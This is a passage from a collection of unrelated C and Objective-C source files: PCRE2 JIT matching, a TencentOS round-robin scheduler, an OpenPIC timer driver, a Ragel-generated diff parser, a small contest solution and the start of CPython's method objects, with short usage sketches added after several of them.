Arguments: code points to the compiled expression subject points to the subject string length length of subject string (may contain binary zeros) start_offset where to start in the subject string options option bits match_data points to a match_data block mcontext points to a match context Returns: > 0 => success; value is the number of ovector pairs filled = 0 => success, but ovector is not big enough -1 => failed to match (PCRE_ERROR_NOMATCH) < -1 => some kind of unexpected problem */ PCRE2_EXP_DEFN int PCRE2_CALL_CONVENTION pcre2_jit_match(const pcre2_code *code, PCRE2_SPTR subject, PCRE2_SIZE length, PCRE2_SIZE start_offset, uint32_t options, pcre2_match_data *match_data, pcre2_match_context *mcontext) { #ifndef SUPPORT_JIT (void)code; (void)subject; (void)length; (void)start_offset; (void)options; (void)match_data; (void)mcontext; return PCRE2_ERROR_JIT_BADOPTION; #else /* SUPPORT_JIT */ pcre2_real_code *re = (pcre2_real_code *)code; executable_functions *functions = (executable_functions *)re->executable_jit; pcre2_jit_stack *jit_stack; uint32_t oveccount = match_data->oveccount; uint32_t max_oveccount; union { void *executable_func; jit_function call_executable_func; } convert_executable_func; jit_arguments arguments; int rc; int index = 0; if ((options & PCRE2_PARTIAL_HARD) != 0) index = 2; else if ((options & PCRE2_PARTIAL_SOFT) != 0) index = 1; if (functions == NULL || functions->executable_funcs[index] == NULL) return PCRE2_ERROR_JIT_BADOPTION; /* Sanity checks should be handled by pcre_exec. */ arguments.str = subject + start_offset; arguments.begin = subject; arguments.end = subject + length; arguments.match_data = match_data; arguments.startchar_ptr = subject; arguments.mark_ptr = NULL; arguments.options = options; if (mcontext != NULL) { arguments.callout = mcontext->callout; arguments.callout_data = mcontext->callout_data; arguments.offset_limit = mcontext->offset_limit; arguments.limit_match = (mcontext->match_limit < re->limit_match)? mcontext->match_limit : re->limit_match; if (mcontext->jit_callback != NULL) jit_stack = mcontext->jit_callback(mcontext->jit_callback_data); else jit_stack = (pcre2_jit_stack *)mcontext->jit_callback_data; } else { arguments.callout = NULL; arguments.callout_data = NULL; arguments.offset_limit = PCRE2_UNSET; arguments.limit_match = (MATCH_LIMIT < re->limit_match)? MATCH_LIMIT : re->limit_match; jit_stack = NULL; } max_oveccount = functions->top_bracket; if (oveccount > max_oveccount) oveccount = max_oveccount; arguments.oveccount = oveccount << 1; convert_executable_func.executable_func = functions->executable_funcs[index]; if (jit_stack != NULL) { arguments.stack = (struct sljit_stack *)(jit_stack->stack); rc = convert_executable_func.call_executable_func(&arguments); } else rc = jit_machine_stack_exec(&arguments, convert_executable_func.call_executable_func); if (rc > (int)oveccount) rc = 0; match_data->code = re; match_data->subject = (rc >= 0 || rc == PCRE2_ERROR_PARTIAL)? subject : NULL; match_data->rc = rc; match_data->startchar = arguments.startchar_ptr - subject; match_data->leftchar = 0; match_data->rightchar = 0; match_data->mark = arguments.mark_ptr; match_data->matchedby = PCRE2_MATCHEDBY_JIT; return match_data->rc; #endif /* SUPPORT_JIT */ } /* End of pcre2_jit_match.c */
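/*
 * Illustrative usage sketch (not part of the original file), assuming the
 * 8-bit PCRE2 library: compile a pattern, JIT-compile it, then drive
 * pcre2_jit_match() directly. As the comment above notes, this entry point
 * skips the sanity checks that pcre2_match() would perform. The
 * PCRE2_JIT_MATCH_DEMO guard is hypothetical.
 */
#ifdef PCRE2_JIT_MATCH_DEMO
#define PCRE2_CODE_UNIT_WIDTH 8
#include <pcre2.h>
#include <stdio.h>

int main(void)
{
    int errcode;
    PCRE2_SIZE erroff;
    pcre2_code *re = pcre2_compile((PCRE2_SPTR)"a+b", PCRE2_ZERO_TERMINATED,
                                   0, &errcode, &erroff, NULL);
    if (re == NULL || pcre2_jit_compile(re, PCRE2_JIT_COMPLETE) != 0)
        return 1;

    pcre2_match_data *md = pcre2_match_data_create_from_pattern(re, NULL);
    int rc = pcre2_jit_match(re, (PCRE2_SPTR)"xxaab", 5, 0, 0, md, NULL);
    printf("rc=%d\n", rc);   /* > 0: number of ovector pairs filled */

    pcre2_match_data_free(md);
    pcre2_code_free(re);
    return 0;
}
#endif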
214403.c
/*---------------------------------------------------------------------------- * Tencent is pleased to support the open source community by making TencentOS * available. * * Copyright (C) 2019 THL A29 Limited, a Tencent company. All rights reserved. * If you have downloaded a copy of the TencentOS binary from Tencent, please * note that the TencentOS binary is licensed under the BSD 3-Clause License. * * If you have downloaded a copy of the TencentOS source code from Tencent, * please note that TencentOS source code is licensed under the BSD 3-Clause * License, except for the third-party components listed below which are * subject to different license terms. Your integration of TencentOS into your * own projects may require compliance with the BSD 3-Clause License, as well * as the other licenses applicable to the third-party components included * within TencentOS. *---------------------------------------------------------------------------*/ #include "tos.h" #if TOS_CFG_ROUND_ROBIN_EN > 0u __API__ void tos_robin_default_timeslice_config(k_timeslice_t default_timeslice) { TOS_CPU_CPSR_ALLOC(); TOS_CPU_INT_DISABLE(); if (default_timeslice > (k_timeslice_t)0u) { k_robin_default_timeslice = default_timeslice; } else { k_robin_default_timeslice = TOS_CFG_CPU_TICK_PER_SECOND / 10; } TOS_CPU_INT_ENABLE(); } __API__ void tos_robin_timeslice_set(k_task_t *task, k_timeslice_t timeslice) { TOS_CPU_CPSR_ALLOC(); if (!task) { task = k_curr_task; } TOS_CPU_INT_DISABLE(); if (timeslice == (k_timeslice_t)0u) { task->timeslice_reload = k_robin_default_timeslice; } else { task->timeslice_reload = timeslice; } if (task->timeslice_reload > task->timeslice) { task->timeslice = task->timeslice_reload; } TOS_CPU_INT_ENABLE(); } __KERNEL__ void robin_sched(k_prio_t prio) { TOS_CPU_CPSR_ALLOC(); k_task_t *task; TOS_CPU_INT_DISABLE(); task = readyqueue_first_task_get(prio); if (!task || knl_is_idle(task)) { TOS_CPU_INT_ENABLE(); return; } if (readyqueue_is_prio_onlyone(prio)) { TOS_CPU_INT_ENABLE(); return; } if (knl_is_sched_locked()) { TOS_CPU_INT_ENABLE(); return; } if (task->timeslice > (k_timeslice_t)0u) { --task->timeslice; } if (task->timeslice > (k_timeslice_t)0u) { TOS_CPU_INT_ENABLE(); return; } readyqueue_move_head_to_tail(k_curr_task->prio); task = readyqueue_first_task_get(prio); if (task->timeslice_reload == (k_timeslice_t)0u) { task->timeslice = k_robin_default_timeslice; } else { task->timeslice = task->timeslice_reload; } TOS_CPU_INT_ENABLE(); knl_sched(); } #endif
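/*
 * Illustrative usage sketch (not part of the original file): how the two
 * public APIs above are typically combined. The task handle and the tick
 * values are hypothetical; only tos_robin_default_timeslice_config() and
 * tos_robin_timeslice_set() come from the code above. The ROBIN_USAGE_DEMO
 * guard is hypothetical as well.
 */
#ifdef ROBIN_USAGE_DEMO
extern k_task_t demo_task; /* hypothetical task created elsewhere */

void demo_robin_setup(void)
{
    /* every task without an explicit slice gets 50 ticks per turn */
    tos_robin_default_timeslice_config((k_timeslice_t)50u);

    /* give one task a larger share within its priority level */
    tos_robin_timeslice_set(&demo_task, (k_timeslice_t)100u);

    /* per the code above, a NULL task targets the current task and a
       timeslice of 0 falls back to the configured default */
}
#endif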
732890.c
/* * * TINKER Source Code * * * [2009] - [2013] Samuel Steven Truscott * All Rights Reserved. */ #include "opic_timer.h" #include "tinker_api_errors.h" #include "opic_private.h" #define TIMER_DISABLED 0x80000000 /** * Endian swap routine * @param var The variable to swap */ static void opic_swap_endianness(uint32_t* var); static return_t opic_timer_write_register( const void * usr_data, const uint32_t reg, const uint32_t value); static void opic_tmr_timer_setup( const timer_param_t const usr_data, const tinker_time_t * const timeout, timer_callback * const call_back, void * const param); typedef struct opic_timer_t { void * base_address; void * param; } opic_timer_t; static void opic_tmr_timer_cancel(timer_param_t usr_data); void opic_tmr_get_timer(mem_pool_info_t * const pool, uint32_t * base_address, timer_t * timer) { if (base_address && timer && pool) { timer->timer_setup = opic_tmr_timer_setup; timer->timer_cancel = opic_tmr_timer_cancel; timer->usr_data = mem_alloc(pool, sizeof(opic_timer_t)); if (timer->usr_data) { opic_timer_t * const opic_data = (opic_timer_t*)timer->usr_data; opic_data->base_address = base_address; opic_data->param = NULL; timer->usr_data_size = sizeof(opic_timer_t); } } } void opic_tmr_timer_setup( const timer_param_t const usr_data, const tinker_time_t * const timeout, timer_callback * const call_back, void * param) { if (usr_data && call_back) { ((opic_timer_t*)usr_data)->param = param; opic_timer_write_register( ((opic_timer_t*)usr_data)->base_address, TMR_N_VECTOR_PRIORITY_REGISTER, /* flags */ (ISU_POSITIVE_POLARITY_BIT) /* priority */ | (1 << 16) /* port */ | 1); opic_timer_write_register( ((opic_timer_t*)usr_data)->base_address, TMR_N_BASE_COUNT_REGISTER, TIMER_DISABLED); opic_timer_write_register( ((opic_timer_t*)usr_data)->base_address, TMR_N_BASE_COUNT_REGISTER, /* TIMER_TICKS */timeout->seconds); /* TODO need to work this one out */ } } void opic_tmr_timer_cancel(timer_param_t usr_data) { opic_timer_write_register( ((opic_timer_t*)&usr_data)->base_address, TMR_N_BASE_COUNT_REGISTER, TIMER_DISABLED); } return_t opic_timer_write_register( const void * usr_data, const uint32_t reg, const uint32_t value) { return_t err = NO_ERROR; uint32_t new_value = value; uint32_t * base_addr = (uint32_t*)usr_data; switch( reg ) { case TMR_N_CURRENT_COUNT_REGISTER: case TMR_N_BASE_COUNT_REGISTER: case TMR_N_VECTOR_PRIORITY_REGISTER: case TMR_N_DEST_REGISTER: case TMR_FREQ_REPORT_REGISTER: break; default: err = DEVICE_REGISTER_INVALID; break; } #if defined(OPIC_BIG_ENDIAN) opic_swap_endianness(&new_value); #endif if ( err == NO_ERROR ) { uint32_t* p_dst = (uint32_t*)(base_addr + reg); *p_dst = new_value; } return err; } static void opic_swap_endianness(uint32_t* var) { const uint32_t copy = *var; *var = ((copy & 0xFF) << 24) | ((copy & 0xFF00) << 8) | ((copy & 0xFF0000) >> 8) | ((copy & 0xFF000000) >> 24); }
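/*
 * Illustrative sketch (not part of the original file): the 32-bit byte swap
 * performed by opic_swap_endianness() above, reduced to a standalone demo.
 * 0x11223344 must come back as 0x44332211. The OPIC_SWAP_DEMO guard is
 * hypothetical.
 */
#ifdef OPIC_SWAP_DEMO
#include <stdint.h>
#include <stdio.h>

static uint32_t swap32(uint32_t v)
{
    return ((v & 0x000000FFu) << 24) |
           ((v & 0x0000FF00u) << 8)  |
           ((v & 0x00FF0000u) >> 8)  |
           ((v & 0xFF000000u) >> 24);
}

int main(void)
{
    printf("0x%08X -> 0x%08X\n", 0x11223344u, swap32(0x11223344u));
    return 0;
}
#endif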
806874.c
#line 1 "DiffParser.m.rl" #import "DiffParser.h" #import "Diff.h" #import "Hunk.h" #import "Stack.h" #import "DiffLine.h" #import "assert.h" //#define LOG_MARK 1 //#define LOG_ACTIONS 1 #line 205 "DiffParser.m.rl" @implementation DiffParser #line 22 "DiffParser.m.c" static const char _DiffParser_actions[] = { 0, 1, 0, 1, 1, 1, 2, 1, 4, 1, 8, 1, 9, 1, 11, 1, 12, 1, 13, 2, 0, 4, 2, 0, 10, 2, 0, 14, 2, 1, 6, 2, 1, 7, 2, 1, 16, 2, 3, 6, 2, 3, 7, 2, 5, 0, 2, 8, 0, 2, 9, 0, 2, 12, 0, 2, 15, 12, 2, 15, 13, 3, 15, 12, 0 }; static const unsigned char _DiffParser_key_offsets[] = { 0, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 23, 24, 25, 26, 28, 29, 30, 31, 32, 33, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 50, 54, 55, 57, 59, 60, 62, 64, 66, 67, 68, 69, 70, 71, 72, 73, 74, 76, 79, 80, 81, 82, 83, 85, 87, 89, 90, 91, 92, 93, 94, 95, 96, 97, 99, 102, 103, 104, 110, 112, 116, 120, 126, 128, 132, 137, 142, 143, 144, 148, 149, 150, 152, 159, 161, 167, 168, 169, 170, 171, 172, 173, 174, 175, 176, 177, 178, 179, 180, 181, 182, 183, 184, 185, 186, 187, 188, 189, 190, 191, 192, 193, 194, 195, 199, 202, 204, 206, 206, 212, 214, 217, 220, 227, 229 }; static const char _DiffParser_trans_keys[] = { 114, 111, 112, 101, 114, 116, 121, 32, 99, 104, 97, 110, 103, 101, 115, 32, 111, 110, 58, 9, 32, 11, 13, 10, 10, 95, 10, 95, 78, 97, 109, 101, 58, 9, 32, 11, 13, 10, 10, 10, 10, 110, 100, 101, 120, 58, 9, 32, 11, 13, 10, 32, 9, 13, 10, 10, 61, 10, 61, 45, 10, 40, 10, 40, 114, 119, 101, 118, 105, 115, 105, 111, 110, 32, 48, 57, 41, 48, 57, 10, 43, 43, 43, 10, 40, 10, 40, 114, 119, 101, 118, 105, 115, 105, 111, 110, 32, 48, 57, 41, 48, 57, 10, 64, 9, 32, 43, 45, 11, 13, 48, 57, 32, 44, 48, 57, 9, 32, 11, 13, 9, 32, 43, 45, 11, 13, 48, 57, 32, 44, 48, 57, 9, 32, 64, 11, 13, 9, 32, 64, 11, 13, 64, 10, 32, 43, 45, 92, 10, 10, 48, 57, 9, 32, 64, 11, 13, 48, 57, 48, 57, 9, 32, 11, 13, 48, 57, 111, 114, 107, 105, 110, 103, 32, 99, 111, 112, 121, 41, 111, 114, 107, 105, 110, 103, 32, 99, 111, 112, 121, 41, 10, 10, 10, 10, 10, 32, 9, 13, 10, 73, 80, 10, 80, 10, 78, 10, 39, 45, 67, 80, 124, 10, 80, 10, 45, 80, 10, 64, 80, 10, 32, 43, 45, 64, 80, 92, 10, 80, 10, 80, 114, 0 }; static const char _DiffParser_single_lengths[] = { 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 1, 1, 1, 2, 1, 1, 1, 1, 1, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 1, 2, 2, 1, 2, 2, 2, 1, 1, 1, 1, 1, 1, 1, 1, 0, 1, 1, 1, 1, 1, 2, 2, 2, 1, 1, 1, 1, 1, 1, 1, 1, 0, 1, 1, 1, 4, 0, 2, 2, 4, 0, 2, 3, 3, 1, 1, 4, 1, 1, 0, 3, 0, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 3, 2, 2, 0, 6, 2, 3, 3, 7, 2, 3 }; static const char _DiffParser_range_lengths[] = { 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 1, 2, 1, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 }; static const short _DiffParser_index_offsets[] = { 0, 0, 2, 4, 6, 8, 10, 12, 14, 16, 18, 20, 22, 24, 26, 28, 30, 32, 34, 36, 38, 42, 44, 46, 48, 51, 53, 55, 57, 59, 61, 65, 67, 69, 71, 73, 75, 77, 79, 81, 83, 87, 91, 93, 96, 99, 101, 104, 107, 110, 112, 114, 116, 118, 120, 122, 124, 126, 128, 131, 133, 135, 137, 139, 142, 145, 148, 150, 152, 154, 156, 158, 160, 162, 164, 166, 169, 171, 173, 179, 181, 185, 189, 195, 197, 201, 206, 
211, 213, 215, 220, 222, 224, 226, 232, 234, 239, 241, 243, 245, 247, 249, 251, 253, 255, 257, 259, 261, 263, 265, 267, 269, 271, 273, 275, 277, 279, 281, 283, 285, 287, 289, 291, 293, 295, 299, 303, 306, 309, 310, 317, 320, 324, 328, 336, 339 }; static const unsigned char _DiffParser_indicies[] = { 0, 1, 2, 1, 3, 1, 4, 1, 5, 1, 6, 1, 7, 1, 8, 1, 9, 1, 10, 1, 11, 1, 12, 1, 13, 1, 14, 1, 15, 1, 16, 1, 17, 1, 18, 1, 19, 1, 20, 20, 20, 1, 1, 21, 23, 22, 24, 1, 25, 24, 1, 26, 1, 27, 1, 28, 1, 29, 1, 30, 1, 31, 31, 31, 1, 1, 32, 33, 32, 1, 34, 35, 34, 36, 1, 37, 1, 38, 1, 39, 1, 40, 1, 41, 41, 41, 1, 1, 43, 43, 42, 45, 44, 46, 47, 1, 48, 47, 1, 49, 1, 1, 1, 50, 1, 51, 50, 52, 53, 1, 54, 1, 55, 1, 56, 1, 57, 1, 58, 1, 59, 1, 60, 1, 61, 1, 62, 1, 63, 64, 1, 65, 1, 66, 1, 67, 1, 68, 1, 1, 1, 69, 1, 70, 69, 71, 72, 1, 73, 1, 74, 1, 75, 1, 76, 1, 77, 1, 78, 1, 79, 1, 80, 1, 81, 1, 82, 83, 1, 84, 1, 85, 1, 85, 85, 86, 86, 85, 1, 87, 1, 88, 89, 90, 1, 91, 91, 91, 1, 92, 92, 93, 93, 92, 1, 94, 1, 95, 96, 97, 1, 98, 98, 99, 98, 1, 100, 100, 101, 100, 1, 102, 1, 103, 1, 104, 104, 104, 105, 1, 107, 106, 109, 108, 110, 1, 111, 111, 113, 111, 112, 1, 114, 1, 115, 115, 115, 116, 1, 117, 1, 118, 1, 119, 1, 120, 1, 121, 1, 122, 1, 123, 1, 124, 1, 125, 1, 126, 1, 127, 1, 128, 1, 129, 1, 130, 1, 131, 1, 132, 1, 133, 1, 134, 1, 135, 1, 136, 1, 137, 1, 138, 1, 139, 1, 140, 1, 1, 141, 142, 141, 1, 143, 144, 143, 45, 43, 43, 42, 145, 146, 147, 1, 145, 147, 1, 148, 26, 1, 1, 150, 1, 151, 152, 153, 1, 149, 154, 155, 1, 154, 156, 155, 1, 157, 158, 159, 1, 160, 161, 161, 161, 162, 163, 108, 1, 164, 165, 1, 154, 155, 0, 1, 0 }; static const unsigned char _DiffParser_trans_targs[] = { 2, 0, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 127, 36, 37, 38, 39, 40, 41, 42, 124, 42, 43, 43, 44, 129, 46, 47, 48, 49, 108, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 58, 60, 61, 62, 63, 64, 65, 66, 96, 67, 68, 69, 70, 71, 72, 73, 74, 75, 76, 75, 132, 78, 79, 80, 81, 94, 80, 82, 82, 83, 84, 85, 92, 84, 86, 87, 86, 87, 88, 89, 90, 91, 90, 133, 91, 133, 93, 86, 93, 87, 95, 82, 95, 97, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 76, 109, 110, 111, 112, 113, 114, 115, 116, 117, 118, 119, 59, 121, 122, 123, 134, 126, 35, 1, 128, 130, 130, 131, 120, 135, 126, 1, 45, 126, 77, 1, 126, 90, 77, 1, 126, 1 }; static const char _DiffParser_trans_actions[] = { 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 7, 0, 43, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 0, 0, 7, 7, 0, 43, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 7, 28, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 7, 31, 0, 1, 0, 0, 7, 34, 3, 0, 5, 0, 0, 7, 34, 3, 0, 5, 5, 0, 0, 0, 25, 19, 1, 0, 22, 0, 1, 7, 3, 0, 3, 7, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 40, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 37, 0, 1, 0, 1, 1, 13, 0, 1, 0, 49, 0, 0, 11, 49, 11, 0, 52, 17, 15, 61, 7, 58, 55, 46, 9 }; static const char _DiffParser_eof_actions[] = { 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 11, 11, 11, 15, 55, 9, 11 }; static const int DiffParser_start = 125; static const int DiffParser_first_final = 125; static const int DiffParser_error = 0; static const int 
DiffParser_en_main = 125; #line 210 "DiffParser.m.rl" - (NSString*)copyMarkedString { assert( p ); assert( pmark ); int size = p - pmark; assert( size > 0 ); char* buffer = malloc( ( size + 1 ) * sizeof(char) ); assert( buffer ); memset( buffer, 0x00, size + 1 ); strncpy( buffer, pmark, size ); if( *( buffer + size ) == '\n' ) *( buffer + size ) = 0x00; // Jettison trailing '\n' NSString* content = [NSString stringWithCString:buffer encoding:NSASCIIStringEncoding]; free( buffer ); return content; } - (id)init { if ((self = [super init]) != nil) { stack = [[Stack alloc] init]; line = 1; error = nil; #line 300 "DiffParser.m.c" { cs = DiffParser_start; } #line 240 "DiffParser.m.rl" } return self; } - (void)dealloc { [stack release]; [super dealloc]; } - (void)finish { #line 319 "DiffParser.m.c" #line 253 "DiffParser.m.rl" } - (Diff *)diff:(NSString *)__content error:(NSError **)__error { p = pstart = [__content UTF8String]; const char* pe = p + [__content length]; #line 330 "DiffParser.m.c" { int _klen; unsigned int _trans; const char *_acts; unsigned int _nacts; const char *_keys; if ( p == pe ) goto _test_eof; if ( cs == 0 ) goto _out; _resume: _keys = _DiffParser_trans_keys + _DiffParser_key_offsets[cs]; _trans = _DiffParser_index_offsets[cs]; _klen = _DiffParser_single_lengths[cs]; if ( _klen > 0 ) { const char *_lower = _keys; const char *_mid; const char *_upper = _keys + _klen - 1; while (1) { if ( _upper < _lower ) break; _mid = _lower + ((_upper-_lower) >> 1); if ( (*p) < *_mid ) _upper = _mid - 1; else if ( (*p) > *_mid ) _lower = _mid + 1; else { _trans += (_mid - _keys); goto _match; } } _keys += _klen; _trans += _klen; } _klen = _DiffParser_range_lengths[cs]; if ( _klen > 0 ) { const char *_lower = _keys; const char *_mid; const char *_upper = _keys + (_klen<<1) - 2; while (1) { if ( _upper < _lower ) break; _mid = _lower + (((_upper-_lower) >> 1) & ~1); if ( (*p) < _mid[0] ) _upper = _mid - 2; else if ( (*p) > _mid[1] ) _lower = _mid + 2; else { _trans += ((_mid - _keys)>>1); goto _match; } } _trans += _klen; } _match: _trans = _DiffParser_indicies[_trans]; cs = _DiffParser_trans_targs[_trans]; if ( _DiffParser_trans_actions[_trans] == 0 ) goto _again; _acts = _DiffParser_actions + _DiffParser_trans_actions[_trans]; _nacts = (unsigned int) *_acts++; while ( _nacts-- > 0 ) { switch ( *_acts++ ) { case 0: #line 29 "DiffParser.m.rl" { line += 1; } break; case 1: #line 33 "DiffParser.m.rl" { NSString* item = [self copyMarkedString]; #if LOG_ACTIONS NSLog( @" Pushing: '%@'", item ); #endif [stack pushObject:item]; } break; case 2: #line 41 "DiffParser.m.rl" { #if LOG_ACTIONS NSLog( @" Pushing: 0" ); #endif [stack pushObject:@"0"]; } break; case 3: #line 48 "DiffParser.m.rl" { #if LOG_ACTIONS NSLog( @" Pushing: -1" ); #endif [stack pushObject:@"-1"]; } break; case 4: #line 55 "DiffParser.m.rl" { #if LOG_MARK NSLog( @"Marking @ %p '%c'", p, *p ); #endif pmark = p; } break; case 5: #line 62 "DiffParser.m.rl" { NSString* fileSpec = [self copyMarkedString]; #if LOG_ACTIONS NSLog( @" filespec: %@", fileSpec ); #endif [diff setFile:fileSpec]; } break; case 6: #line 70 "DiffParser.m.rl" { int rev = [[stack popObject] intValue]; #if LOG_ACTIONS NSLog( @" oldRev: %d", rev ); #endif [diff setOldRev:rev]; } break; case 7: #line 78 "DiffParser.m.rl" { int rev = [[stack popObject] intValue]; #if LOG_ACTIONS NSLog( @" newRev: %d", rev ); #endif [diff setNewRev:rev]; } break; case 8: #line 86 "DiffParser.m.rl" { #if LOG_ACTIONS NSLog( @" BINARY DIFF" ); #endif [diff setIsBinary:YES]; } break; case 
9: #line 93 "DiffParser.m.rl" { #if LOG_ACTIONS NSLog( @" EMPTY DIFF" ); #endif } break; case 10: #line 99 "DiffParser.m.rl" { [curHunk addLine:[[DiffLine alloc] initWithString:[self copyMarkedString]]]; } break; case 11: #line 103 "DiffParser.m.rl" { #if LOG_ACTIONS NSLog( @"begin_diff" ); #endif diff = [[Diff alloc] init]; } break; case 12: #line 110 "DiffParser.m.rl" { #if LOG_ACTIONS NSLog( @"end_diff" ); #endif } break; case 13: #line 116 "DiffParser.m.rl" { #if LOG_ACTIONS NSLog( @" begin_hunk" ); #endif curHunk = [[Hunk alloc] init]; } break; case 14: #line 123 "DiffParser.m.rl" { [curHunk setNewExtent:[[stack popObject] intValue]]; [curHunk setNewFirstLine:[[stack popObject] intValue]]; [curHunk setOldExtent:[[stack popObject] intValue]]; [curHunk setOldFirstLine:[[stack popObject] intValue]]; } break; case 15: #line 130 "DiffParser.m.rl" { #if LOG_ACTIONS NSLog( @" end_hunk" ); #endif [diff addHunk:curHunk]; } break; case 16: #line 177 "DiffParser.m.rl" { p--; } break; #line 548 "DiffParser.m.c" } } _again: if ( cs == 0 ) goto _out; if ( ++p != pe ) goto _resume; _test_eof: {} if ( p == eof ) { const char *__acts = _DiffParser_actions + _DiffParser_eof_actions[cs]; unsigned int __nacts = (unsigned int) *__acts++; while ( __nacts-- > 0 ) { switch ( *__acts++ ) { case 8: #line 86 "DiffParser.m.rl" { #if LOG_ACTIONS NSLog( @" BINARY DIFF" ); #endif [diff setIsBinary:YES]; } break; case 9: #line 93 "DiffParser.m.rl" { #if LOG_ACTIONS NSLog( @" EMPTY DIFF" ); #endif } break; case 12: #line 110 "DiffParser.m.rl" { #if LOG_ACTIONS NSLog( @"end_diff" ); #endif } break; case 15: #line 130 "DiffParser.m.rl" { #if LOG_ACTIONS NSLog( @" end_hunk" ); #endif [diff addHunk:curHunk]; } break; #line 598 "DiffParser.m.c" } } } _out: {} } #line 261 "DiffParser.m.rl" [self finish]; if( cs == DiffParser_error ) { NSLog( @"Parser finished with an error." ); } if( __error != nil ) { *__error = error; } return diff; } @end
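/*
 * Illustrative sketch (not part of the original file): copyMarkedString
 * above uses the classic Ragel mark-and-copy idiom -- remember a pointer
 * (pmark) when a token starts, then copy the half-open range [pmark, p)
 * when it ends. The same idiom in plain C, with hypothetical names and a
 * hypothetical MARK_COPY_DEMO guard:
 */
#ifdef MARK_COPY_DEMO
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

static char *copy_marked(const char *pmark, const char *p)
{
    size_t size = (size_t)(p - pmark);
    char *buffer = malloc(size + 1);
    if (buffer) {
        memcpy(buffer, pmark, size);
        buffer[size] = '\0';
    }
    return buffer;
}

int main(void)
{
    const char *input = "Index: foo.c\n";
    const char *pmark = input + 7;       /* token starts after "Index: " */
    const char *p = strchr(input, '\n'); /* token ends at the newline */
    char *tok = copy_marked(pmark, p);
    printf("'%s'\n", tok);               /* prints 'foo.c' */
    free(tok);
    return 0;
}
#endif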
233345.c
#include <stdio.h>

int main(void) /* main must return int, not long long int */
{
    int t;
    scanf("%d", &t);
    while (t--) {
        int n;
        scanf("%d", &n);
        long long int sp[10001];
        for (int i = 0; i < n; i++) {
            scanf("%lli", &sp[i]);
        }
        int cnt = 1;
        for (int i = 0; i < (n - 1); i++) {
            if (sp[i + 1] < sp[i])
                cnt++;             /* strictly lower value: a new reading */
            else
                sp[i + 1] = sp[i]; /* carry the running minimum forward */
        }
        printf("%d\n", cnt);
    }
    return 0;
}
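/*
 * Illustrative trace (not part of the original file): with n = 4 and inputs
 * {12, 10, 15, 11} the running minimum evolves 12, 10, 10, 10, so the
 * counter increments only once (10 < 12) and the program prints 2. The
 * SPEED_TRACE_DEMO guard is hypothetical, so this does not clash with the
 * main() above.
 */
#ifdef SPEED_TRACE_DEMO
#include <stdio.h>

int main(void)
{
    long long sp[] = {12, 10, 15, 11};
    int n = 4, cnt = 1;
    for (int i = 0; i < n - 1; i++) {
        if (sp[i + 1] < sp[i])
            cnt++;               /* a new, lower value is recorded */
        else
            sp[i + 1] = sp[i];   /* clamp to the minimum seen so far */
    }
    printf("%d\n", cnt);         /* prints 2 */
    return 0;
}
#endif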
987705.c
/* Method object implementation */ #include "Python.h" #include "structmember.h" /* Free list for method objects to safe malloc/free overhead * The m_self element is used to chain the objects. */ static PyCFunctionObject *free_list = NULL; static int numfree = 0; #ifndef PyCFunction_MAXFREELIST #define PyCFunction_MAXFREELIST 256 #endif PyObject * PyCFunction_NewEx(PyMethodDef *ml, PyObject *self, PyObject *module) { PyCFunctionObject *op; op = free_list; if (op != NULL) { free_list = (PyCFunctionObject *)(op->m_self); PyObject_INIT(op, &PyCFunction_Type); numfree--; } else { op = PyObject_GC_New(PyCFunctionObject, &PyCFunction_Type); if (op == NULL) return NULL; } op->m_ml = ml; Py_XINCREF(self); op->m_self = self; Py_XINCREF(module); op->m_module = module; _PyObject_GC_TRACK(op); return (PyObject *)op; } PyCFunction PyCFunction_GetFunction(PyObject *op) { if (!PyCFunction_Check(op)) { PyErr_BadInternalCall(); return NULL; } 